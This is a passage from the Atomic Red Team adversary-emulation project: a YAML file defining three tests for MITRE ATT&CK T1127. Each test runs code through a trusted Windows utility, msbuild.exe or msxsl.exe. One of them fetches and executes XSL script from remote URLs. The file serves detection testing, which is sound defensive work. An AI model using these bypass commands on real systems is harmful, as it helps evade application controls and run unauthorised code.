security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9ab98d23188317182dcbf9299feb06fd4e49449f
atomic-red-team/atomics/T1127/T1127.yaml
T
Tony M Lambert 03adb61ee4 Added remote test, simplified script file
2018-09-14 20:35:48 -05:00

57 lines
2.1 KiB
YAML
Raw Blame History

---
attack_technique: T1127
display_name: Trusted Developer Utilities
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks
description: |
Executes the code in a project file using. C# Example
supported_platforms:
- windows
input_arguments:
filename:
description: Location of the project file
type: Path
default: T1127.csproj
executor:
name: command_prompt
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
- name: MSXSL Bypass using local files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Location of the test XML file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml
xslfile:
description: Location of the test XSL script file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
- name: MSXSL Bypass using remote files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Remote location (URL) of the test XML file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
Reference in New Issue View Git Blame Copy Permalink